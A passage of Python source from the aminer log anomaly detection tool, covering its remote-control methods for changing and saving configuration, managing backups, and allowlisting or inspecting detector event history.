analysis_context.aminer_config.config_properties: find_str = f"config_properties['{config_property}'] = " pos = old.find(find_str) if pos == -1: msg += f"WARNING: {find_str}not found in the old config file.\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) else: string = old[pos + len(find_str):] old_len = string.find('\n') string = string[:old_len] prop = analysis_context.aminer_config.config_properties[config_property] if (string[0] == "'" and string[-1] == "'") or (string[0] == '"' and string[-1] == '"'): prop = "'" + prop + "'" if f"{string}" != f"{prop}": old = old[:pos + len(find_str)] + f"{prop}" + old[pos + len(find_str) + old_len:] for component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(component_id) name = analysis_context.get_name_by_component(component) start = 0 old_start = 0 for i in range(0, component_id + 1): start = start + 1 start = old.find('.register_component(', start) if old_start > start: break old_start = start if old.find('component_name', start) < old.find(')', start): old_component_name_start = old.find('"', old.find('component_name', start)) old_component_name_end = old.find('"', old_component_name_start + 1) if old_component_name_start > old.find(')', start) or old_component_name_start == -1: old_component_name_start = old.find("'", old.find('component_name', start)) old_component_name_end = old.find("'", old_component_name_start + 1) old_len = old_component_name_end - old_component_name_start + 1 old_component_name = old[old_component_name_start:] old_component_name = old_component_name[:old_len] if old_component_name != f'"{name}"': old = old[:old_component_name_start] + f'"{name}"' + old[old_component_name_end + 1:] log_dir = analysis_context.aminer_config.config_properties.get(KEY_LOG_DIR, DEFAULT_LOG_DIR) remote_control_log_file = analysis_context.aminer_config.config_properties.get( KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, DEFAULT_REMOTE_CONTROL_LOG_FILE)) try: with open(remote_control_log_file, "r") as logFile: logs = logFile.readlines() except OSError as e: msg = f"Could not read {remote_control_log_file}: {e}\n" logging.getLogger(DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) i = len(logs) - 1 while i > 0: if "INFO aminer started." in logs[i]: logs = logs[i:] break i = i - 1 for i, log in enumerate(logs): if "REMOTECONTROL change_attribute_of_registered_analysis_component" in log: log = log[:log.find('#')] arr = log.split(',', 3) if arr[1].find("'") != -1: component_name = arr[1].split("'")[1] else: component_name = arr[1].split('"')[1] if arr[2].find("'") != -1: attr = arr[2].split("'")[1] else: attr = arr[2].split('"')[1] value = arr[3].strip().split(")")[0] pos = old.find(f'component_name="{component_name}"') if pos == -1: pos = old.find(f"component_name='{component_name}'") while old[pos] != '\n': pos = pos - 1 pos = old.find(register_component, pos) + len(register_component) var = old[pos:old.find(',', pos)] pos = old.find(f"{var} =") if pos == -1: pos = old.find(f"{var}=") pos = old.find(attr, pos) p1 = old.find(")", pos) p2 = old.find(",", pos) if -1 not in (p1, p2): end = min(old.find(")", pos), old.find(",", pos)) elif p1 == -1 and p2 == -1: msg += f"WARNING: '{component_name}.{attr}' could not be found in the current config!\n" rc_logger = logging.getLogger(REMOTE_CONTROL_LOG_NAME) rc_logger.warning(msg.strip('\n')) continue elif p1 == -1: end = p2 elif p2 == -1: end = p1 old = old[:old.find("=", pos) + 1] + f"{value}" + old[end:] if "REMOTECONTROL add_handler_to_atom_filter_and_register_analysis_component" in log: parameters = log.split(",", 2) # find the name of the filter_config variable in the old config. pos = old.find(parameters[1].strip()) new_pos = pos while old[new_pos] != '\n': new_pos = new_pos - 1 filter_config = old[new_pos:pos] pos = filter_config.find(register_component) + len(register_component) filter_config = filter_config[pos:filter_config.find(',', pos)].strip() new_parameters = parameters[2].split(")") component_name = new_parameters[1].strip(', ') var = f"analysis_component{VAR_ID}" VAR_ID = VAR_ID + 1 old = old + f"\n {var} = {new_parameters[0].strip()})" old = old + f"\n {filter_config}.register_component({var}, component_name={component_name})" old = old + f"\n {filter_config}.add_handler({var})\n" # remove double lines old = old.replace('\n\n\n', '\n\n') try: with open(new_file, "w") as file: file.write(old) msg += f"Successfully saved the current config to {new_file}." logging.getLogger(DEBUG_LOG_NAME).info(msg) return msg except FileNotFoundError: msg += f"FAILURE: file '{new_file}' could not be found or opened!" logging.getLogger(DEBUG_LOG_NAME).error(msg) return msg AminerRemoteControlExecutionMethods.py000066400000000000000000001166201500476301700366440ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer"""This module contains methods which can be executed from the aminerRemoteControl class. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import aminer import resource import os import shutil from time import time from datetime import datetime import logging import re from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util import PersistenceUtil from aminer import AnalysisChild, AminerConfig from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, \ KEY_RESOURCES_MAX_MEMORY_USAGE, KEY_LOG_PREFIX, KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST, DEBUG_LOG_NAME attr_str = '"%s": %s,\n' component_not_found = 'Event history component not found.' class AminerRemoteControlExecutionMethods: """This class defines all possible methods for the remote control.""" REMOTE_CONTROL_RESPONSE = '' ERROR_MESSAGE_RESOURCE_NOT_FOUND = '"Resource \\"%s\\" could not be found."' CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress' CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress' CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix' CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime' CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime' CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap' CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap' CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage' MAIL_CONFIG_PROPERTIES = [CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS] INTEGER_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_ALERT_GRACE_TIME, CONFIG_KEY_EVENT_COLLECT_TIME, CONFIG_KEY_ALERT_MIN_GAP, CONFIG_KEY_ALERT_MAX_GAP, CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_LEVEL, KEY_LOG_DEBUG_LEVEL, KEY_LOG_STAT_PERIOD, KEY_RESOURCES_MAX_MEMORY_USAGE ] STRING_CONFIG_PROPERTY_LIST = [ CONFIG_KEY_MAIL_TARGET_ADDRESS, CONFIG_KEY_MAIL_FROM_ADDRESS, CONFIG_KEY_MAIL_SUBJECT_PREFIX, KEY_LOG_PREFIX ] def print_response(self, value): """Add a value to the response string.""" self.REMOTE_CONTROL_RESPONSE += str(value) def change_config_property(self, analysis_context, property_name, value): """Change a config_property in an running aminer instance.""" result = 0 config_keys_mail_alerting = [ self.CONFIG_KEY_MAIL_TARGET_ADDRESS, self.CONFIG_KEY_MAIL_FROM_ADDRESS, self.CONFIG_KEY_MAIL_SUBJECT_PREFIX, self.CONFIG_KEY_EVENT_COLLECT_TIME, self.CONFIG_KEY_ALERT_MIN_GAP, self.CONFIG_KEY_ALERT_MAX_GAP, self.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, self.CONFIG_KEY_MAIL_ALERT_GRACE_TIME] if not isinstance(analysis_context, AnalysisChild.AnalysisContext): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the analysis_context must be of type {AnalysisChild.AnalysisContext.__class__}." return if property_name not in self.INTEGER_CONFIG_PROPERTY_LIST + self.STRING_CONFIG_PROPERTY_LIST: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' does not exist in the current config!" return if property_name in self.INTEGER_CONFIG_PROPERTY_LIST: t = int else: t = str if not isinstance(value, t): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the value of the property '{property_name}' must be of type {t}!" return if property_name in [KEY_PERSISTENCE_DIR, KEY_LOG_SOURCES_LIST]: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the property '{property_name}' can only be changed at startup in the aminer root" \ f" process!" return if property_name == KEY_RESOURCES_MAX_MEMORY_USAGE: result = self.change_config_property_max_memory(analysis_context, value) elif property_name in config_keys_mail_alerting: result = self.change_config_property_mail_alerting(analysis_context, property_name, value) elif property_name in (KEY_LOG_PREFIX, KEY_PERSISTENCE_PERIOD, KEY_LOG_STAT_PERIOD): analysis_context.aminer_config.config_properties[property_name] = value result = 0 elif property_name == KEY_LOG_STAT_LEVEL: result = self.change_config_property_log_stat_level(analysis_context, value) elif property_name == KEY_LOG_DEBUG_LEVEL: result = self.change_config_property_log_debug_level(analysis_context, value) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property {property_name} could not be changed. Please check the property_name again." return if result == 0: msg = f"'{property_name}' changed to '{value}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def change_config_property_mail_alerting(self, analysis_context, property_name, value): """Change any mail property.""" is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)|^[a-zA-Z0-9]+@localhost$") if property_name in self.MAIL_CONFIG_PROPERTIES and not is_email.match(value): self.REMOTE_CONTROL_RESPONSE += "FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!" return 1 analysis_context.aminer_config.config_properties[property_name] = value for analysis_component_id in analysis_context.get_registered_component_ids(): component = analysis_context.get_component_by_id(analysis_component_id) if component.__class__.__name__ == "DefaultMailNotificationEventHandler": setattr(component, property_name, value) return 0 def change_config_property_max_memory(self, analysis_context, max_memory_mb): """Change the maximal allowed RAM usage of the aminer instance.""" try: max_memory_mb = int(max_memory_mb) if max_memory_mb < 32 and max_memory_mb != -1: self.REMOTE_CONTROL_RESPONSE += "FAILURE: it is not safe to run the aminer with less than 32MB RAM." return 1 resource.setrlimit(resource.RLIMIT_AS, (max_memory_mb * 1024 * 1024, resource.RLIM_INFINITY)) analysis_context.aminer_config.config_properties[KEY_RESOURCES_MAX_MEMORY_USAGE] = max_memory_mb return 0 except ValueError: self.REMOTE_CONTROL_RESPONSE += "FAILURE: property 'maxMemoryUsage' must be of type Integer!" return 1 def change_config_property_log_stat_level(self, analysis_context, stat_level): """Set the statistic logging level.""" if stat_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_STAT_LEVEL] = stat_level AminerConfig.STAT_LEVEL = stat_level return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: STAT_LEVEL {stat_level} is not allowed. Allowed STAT_LEVEL values are 0, 1, 2." return 1 def change_config_property_log_debug_level(self, analysis_context, debug_level): """Set the debug log level.""" if debug_level in (0, 1, 2): analysis_context.aminer_config.config_properties[KEY_LOG_DEBUG_LEVEL] = debug_level AminerConfig.DEBUG_LEVEL = debug_level debug_logger = logging.getLogger(DEBUG_LOG_NAME) if debug_level == 0: debug_logger.setLevel(logging.ERROR) elif debug_level == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) return 0 self.REMOTE_CONTROL_RESPONSE += f"FAILURE: DEBUG_LEVEL {debug_level} is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2." return 1 def change_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute, value): """Change a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. @param value the new value of the attribute. """ attr = getattr(analysis_context.get_component_by_name(component_name), attribute) if type(attr) is type(value): setattr(analysis_context.get_component_by_name(component_name), attribute, value) msg = f"'{component_name}.{attribute}' changed from {repr(attr)} to {value} successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: property '{component_name}.{attribute}' must be of type {type(attr)}!" def rename_registered_analysis_component(self, analysis_context, old_component_name, new_component_name): """Rename an analysis component by removing and readding it to the analysis_context. @param analysis_context the analysis context of the aminer. @param old_component_name the current name of the component. @param new_component_name the new name of the component. """ if type(old_component_name) is not str or type(new_component_name) is not str: self.REMOTE_CONTROL_RESPONSE = "FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str." else: component = analysis_context.get_component_by_name(old_component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{old_component_name}' does not exist." else: analysis_context.registered_components_by_name[old_component_name] = None analysis_context.registered_components_by_name[new_component_name] = component msg = f"Component '{old_component_name}' renamed to '{new_component_name}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def print_config_property(self, analysis_context, property_name): """Print a specific config property. @param analysis_context the analysis context of the aminer. @param property_name the name of the property to be printed. """ if property_name not in analysis_context.aminer_config.config_properties: self.REMOTE_CONTROL_RESPONSE = self.ERROR_MESSAGE_RESOURCE_NOT_FOUND % property_name return val = analysis_context.aminer_config.config_properties[property_name] if isinstance(val, list): val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ').replace("'", '"') else: val = str(val).replace('"False"', 'false').replace('"True"', 'true').replace('"None"', 'null').strip(' ') if val.isdigit(): val = int(val) elif '.' in val: try: val = float(val) except ValueError: pass self.REMOTE_CONTROL_RESPONSE = f'"{property_name}": {val}' def print_attribute_of_registered_analysis_component(self, analysis_context, component_name, attribute): """Print a specific attribute of a registered component. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param attribute the name of the attribute to be printed. """ if type(component_name) is not str or type(attribute) is not str: self.REMOTE_CONTROL_RESPONSE += "FAILURE: the parameters 'component_name' and 'attribute' must be of type str." return if analysis_context.get_component_by_name(component_name) is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not exist." return if hasattr(analysis_context.get_component_by_name(component_name), attribute): attr = getattr(analysis_context.get_component_by_name(component_name), attribute, None) if isinstance(attr, set): attr = list(attr) if hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): new_attr = self.get_all_vars(attr, ' ') if isinstance(new_attr, str): new_attr = f'"{new_attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {new_attr}' elif isinstance(attr, list): self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": [' for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): new_attr = "\n[\n " + at.__class__.__name__ + " {\n" + self.get_all_vars(at, ' ') + " }\n]" else: if isinstance(at, str): new_attr = f'"{at}"' else: new_attr = str(at) self.REMOTE_CONTROL_RESPONSE += f"{new_attr}, " self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.rstrip(", ") self.REMOTE_CONTROL_RESPONSE += "]" else: if attr is None or isinstance(attr, (str, bool)): attr = f'"{attr}"' self.REMOTE_CONTROL_RESPONSE += f'"{component_name}.{attribute}": {attr}' self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace('"False"', 'false').replace('"True"', 'true').replace( '"None"', 'null') else: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: the component '{component_name}' does not have an attribute named '{attribute}'." def print_current_config(self, analysis_context): """Print the entire aminer config. @param analysis_context the analysis context of the aminer. """ for config_property in analysis_context.aminer_config.config_properties: if isinstance(analysis_context.aminer_config.config_properties[config_property], str): self.REMOTE_CONTROL_RESPONSE += f'"{config_property}": ' \ f'"{analysis_context.aminer_config.config_properties[config_property]}",\n' else: self.REMOTE_CONTROL_RESPONSE += attr_str % ( config_property, analysis_context.aminer_config.config_properties[config_property]) for component_id in analysis_context.get_registered_component_ids(): self.REMOTE_CONTROL_RESPONSE += \ f'"{analysis_context.get_name_by_component(analysis_context.get_component_by_id(component_id))}": ' + '{\n' component = analysis_context.get_component_by_id(component_id) self.REMOTE_CONTROL_RESPONSE += self.get_all_vars(component, ' ') self.REMOTE_CONTROL_RESPONSE += "},\n\n" self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"').replace('"False"', 'false').replace( '"True"', 'true').replace('"None"', 'null').replace('\\"', "'").rstrip(',\n\n\n') + '\n\n' def get_all_vars(self, obj, indent): """Return all variables in string representation.""" result = '' for var in vars(obj): attr = getattr(obj, var, None) if attr is not None and isinstance(attr, (tuple, set)): attr = list(attr) if attr is not None and hasattr(attr, '__dict__') and self.isinstance_aminer_class(attr): result += indent + '"%s": {\n' % var + self.get_all_vars(attr, indent + ' ') + indent + "},\n" elif isinstance(attr, list): for at in attr: if hasattr(at, '__dict__') and self.isinstance_aminer_class(at): result += indent + '"%s": {\n' % var + indent + ' "' + at.__class__.__name__ + \ '": {\n' + self.get_all_vars(at, indent + ' ') + indent + ' ' + "}\n" + indent + '},\n' else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) break else: rep = _reformat_attr(attr) result += indent + attr_str % (var, rep) return result.rstrip(',\n') + '\n' @staticmethod def isinstance_aminer_class(obj): """Test if an object is of an instance of a aminer class.""" class_list = [ aminer.analysis.AtomFilters.SubhandlerFilter, aminer.analysis.AtomFilters.MatchPathFilter, aminer.analysis.AtomFilters.MatchValueFilter, aminer.analysis.HistogramAnalysis.LinearNumericBinDefinition, aminer.analysis.HistogramAnalysis.BinDefinition, aminer.analysis.HistogramAnalysis.ModuloTimeBinDefinition, aminer.analysis.Rules.MatchAction, aminer.analysis.Rules.MatchRule, aminer.analysis.HistogramAnalysis.HistogramData, aminer.analysis.TimeCorrelationViolationDetector.CorrelationRule, aminer.analysis.TimeCorrelationDetector.CorrelationFeature, aminer.events.EventInterfaces.EventHandlerInterface, aminer.util.History.ObjectHistory] for c in class_list: if isinstance(obj, c): return True return False def save_current_config(self, analysis_context, destination_file): """Save the current live config into a file. @param analysis_context the analysis context of the aminer. @param destination_file the path to the file in which the config is saved. """ if re.match("^(/[^/ ]*)+/?$", destination_file) is not None: msg = AminerConfig.save_config(analysis_context, destination_file) else: msg = f"Exception: {destination_file} is not a valid filename!" self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def persist_all(self): """Persist all data by calling the function in PersistenceUtil.""" PersistenceUtil.persist_all() self.REMOTE_CONTROL_RESPONSE = 'OK' logging.getLogger(DEBUG_LOG_NAME).info('Called persist_all() via remote control.') def create_backup(self, analysis_context): """Create a backup with the current datetime string.""" backup_time = time() backup_time_str = datetime.fromtimestamp(backup_time).strftime('%Y-%m-%d-%H-%M-%S') persistence_dir = analysis_context.aminer_config.config_properties[KEY_PERSISTENCE_DIR] persistence_dir = persistence_dir.rstrip('/') backup_path = persistence_dir + '/backup/' backup_path_with_date = os.path.join(backup_path, backup_time_str) shutil.copytree(persistence_dir, backup_path_with_date, ignore=shutil.ignore_patterns('backup*')) msg = f"Created backup {backup_time_str}" self.REMOTE_CONTROL_RESPONSE = f"Created backup {backup_time_str}" logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_backups(self, analysis_context): """List all available backups from the persistence directory.""" persistence_dir = analysis_context.aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) for _dirpath, dirnames, _filenames in os.walk(os.path.join(persistence_dir, 'backup')): self.REMOTE_CONTROL_RESPONSE = f'"backups": {dirnames}' break self.REMOTE_CONTROL_RESPONSE = self.REMOTE_CONTROL_RESPONSE.replace("'", '"') def allowlist_event_in_component(self, analysis_context, component_name, event_data, allowlisting_data=None): """Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param allowlisting_data this data is passed on into the allowlist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if component.__class__.__name__ not in [ "EnhancedNewMatchPathValueComboDetector", "MissingMatchPathValueDetector", "NewMatchPathDetector", "NewMatchPathValueComboDetector", "NewMatchIdValueComboDetector", "EventCorrelationDetector", "NewMatchPathValueDetector"]: self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support allowlisting! Only the following classes " \ f"support allowlisting: EnhancedNewMatchPathValueComboDetector, MissingMatchPathValueDetector, NewMatchPathDetector," \ f" NewMatchIdValueComboDetector, NewMatchPathValueComboDetector, NewMatchPathValueDetector and EventCorrelationDetector." return try: msg = component.allowlist_event(f"Analysis.{component.__class__.__name__}", event_data, allowlisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def blocklist_event_in_component(self, analysis_context, component_name, event_data, blocklisting_data=None): """Blocklists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the allowlist_event method. @param blocklisting_data this data is passed on into the blocklist_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "blocklist_event"): self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component class '{component.__class__.__name__}' does not support blocklisting!" return try: msg = component.blocklist_event(f"Analysis.{component.__class__.__name__}", event_data, blocklisting_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def print_persistence_event_in_component(self, analysis_context, component_name, event_data): """Prints the persistence specified in event_data of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the print_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "print_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the print_persistence_event!" return try: msg = component.print_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_to_persistence_event_in_component(self, analysis_context, component_name, event_data): """Add information specified in event_data to the persistence of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the add_to_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "add_to_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the add_to_persistence_event!" return try: msg = component.add_to_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def remove_from_persistence_event_in_component(self, analysis_context, component_name, event_data): """Remove information specified in event_data from the persistence of component_name. @param analysis_context the analysis context of the aminer. @param component_name the name to be registered in the analysis_context. @param event_data the event_data for the remove_from_persistence_event method. """ component = analysis_context.get_component_by_name(component_name) if component is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component '{component}' does not exist!" return if not hasattr(component, "remove_from_persistence_event"): self.REMOTE_CONTROL_RESPONSE += \ f"FAILURE: component class '{component.__class__.__name__}' does not support the remove_from_persistence_event!" return try: msg = component.remove_from_persistence_event(f"Analysis.{component.__class__.__name__}", event_data) self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) except Exception as e: self.REMOTE_CONTROL_RESPONSE += "Exception: " + repr(e) def add_handler_to_atom_filter_and_register_analysis_component(self, analysis_context, atom_handler, component, component_name): """Add a new component to the analysis_context. @param analysis_context the analysis context of the aminer. @param atom_handler the registered name of the atom_handler component to add the new component to. @param component the component to be added. @param component_name the name to be registered in the analysis_context. """ atom_filter = analysis_context.get_component_by_name(atom_handler) if atom_filter is None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: atom_handler '{atom_handler}' does not exist!" return if analysis_context.get_component_by_name(component_name) is not None: self.REMOTE_CONTROL_RESPONSE += f"FAILURE: component with same name already registered! ({component_name})" return if not isinstance(component, AtomHandlerInterface): self.REMOTE_CONTROL_RESPONSE += "FAILURE: 'component' must implement the AtomHandlerInterface!" return atom_filter.add_handler(component) analysis_context.register_component(component, component_name) msg = f"Component '{component_name}' added to '{atom_handler}' successfully." self.REMOTE_CONTROL_RESPONSE += msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def dump_events_from_history(self, analysis_context, history_component_name, dump_event_id): """Detailed print of a specific event from the history. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param dump_event_id a numeric id of the events to be printed. """ self.REMOTE_CONTROL_RESPONSE = None history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() result_string = 'FAIL: not found' for event_pos in enumerate(history_data): event_id, event_type, event_message, sorted_log_lines, event_data, _event_source = history_data[event_pos] if event_id != dump_event_id: continue append_log_lines_flag = True result_string = f"OK\nEvent {event_id}: {event_message} ({event_type})" if event_type == 'Analysis.NewMatchPathDetector': result_string += f"\n Logline: {sorted_log_lines[0]}" elif event_type == 'Analysis.NewMatchPathValueComboDetector': result_string += '\nParser match:\n' + event_data[0].parser_match.matchElement.annotate_match(' ') elif event_type == 'Analysis.AllowlistViolationDetector': result_string += '\nParser match:\n' + event_data.parser_match.matchElement.annotate_match(' ') elif event_type == 'ParserModel.UnparsedData': result_string += f"\n Unparsed line: {sorted_log_lines[0]}" append_log_lines_flag = False else: result_string += f"\n Data: {str(event_data)}" if append_log_lines_flag and (sorted_log_lines is not None) and (len(sorted_log_lines) != 0): result_string += '\n Log lines:\n %s' % '\n '.join(sorted_log_lines) break self.REMOTE_CONTROL_RESPONSE = result_string logging.getLogger(DEBUG_LOG_NAME).info(result_string) def ignore_events_from_history(self, analysis_context, history_component_name, event_ids): """Ignore one or multiple specific events from the history. These ignores do not affect the components itself. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param event_ids a list of numeric ids of the events to be ignored. """ history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return history_data = history_handler.get_history() id_spec_list = [] for element in event_ids: if isinstance(element, list): id_spec_list.append(element) delete_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, _event_type, _event_message, _sorted_log_lines, _event_data, _event_source = history_data[event_pos] may_delete_flag = False if event_id in event_ids: may_delete_flag = True else: for id_range in id_spec_list: if id_range[0] <= event_id <= id_range[1]: may_delete_flag = True if may_delete_flag: history_data[:] = history_data[:event_pos] + history_data[event_pos + 1:] delete_count += 1 else: event_pos += 1 msg = f"OK\n{delete_count} elements ignored" self.REMOTE_CONTROL_RESPONSE = msg logging.getLogger(DEBUG_LOG_NAME).info(msg) def list_events_from_history(self, analysis_context, history_component_name, max_event_count=None): """List the latest events of a specific history component. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param max_event_count the number of the newest events to be listed. """ history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found else: history_data = history_handler.get_history() max_events = len(history_data) if max_event_count is None or max_events < max_event_count: max_event_count = max_events result_string = 'OK' for event_id, _event_type, event_message, sorted_log_lines, _event_data, _event_source in history_data[:max_event_count]: result_string += f"\nEvent {event_id}: {event_message}; Log data: {repr(sorted_log_lines)}"[:240] self.REMOTE_CONTROL_RESPONSE = result_string def allowlist_events_from_history(self, analysis_context, history_component_name, id_spec_list, allowlisting_data=None): """Allowlists one or multiple specific events from the history in the component it occurred in. @param analysis_context the analysis context of the aminer. @param history_component_name the registered name of the history component. @param id_spec_list a list of numeric ids of the events to be allowlisted. @param allowlisting_data this data is passed on into the allowlist_event method. """ from aminer.events.EventInterfaces import EventSourceInterface history_handler = analysis_context.get_component_by_name(history_component_name) if history_handler is None: self.REMOTE_CONTROL_RESPONSE = component_not_found return if id_spec_list is None or not isinstance(id_spec_list, list): self.REMOTE_CONTROL_RESPONSE = \ 'Request requires remote_control_data with ID specification list and optional allowlisting information.' return history_data = history_handler.get_history() result_string = '' lookup_count = 0 event_pos = 0 while event_pos < len(history_data): event_id, event_type, _event_message, sorted_log_lines, event_data, event_source = history_data[event_pos] found_flag = False if event_id in id_spec_list: found_flag = True else: for id_range in id_spec_list: if isinstance(id_range, list) and (id_range[0] <= event_id <= id_range[1]): found_flag = True if not found_flag: event_pos += 1 continue lookup_count += 1 allowlisted_flag = False if isinstance(event_source, EventSourceInterface): # This should be the default for all detectors. try: message = event_source.allowlist_event( event_type, sorted_log_lines, event_data, allowlisting_data) result_string += f"OK {event_id}: {message}\n" logging.getLogger(DEBUG_LOG_NAME).info(result_string) allowlisted_flag = True except NotImplementedError: result_string += f"FAIL {event_id}: component does not support allowlisting." except Exception as wl_exception: result_string += f"FAIL {event_id}: 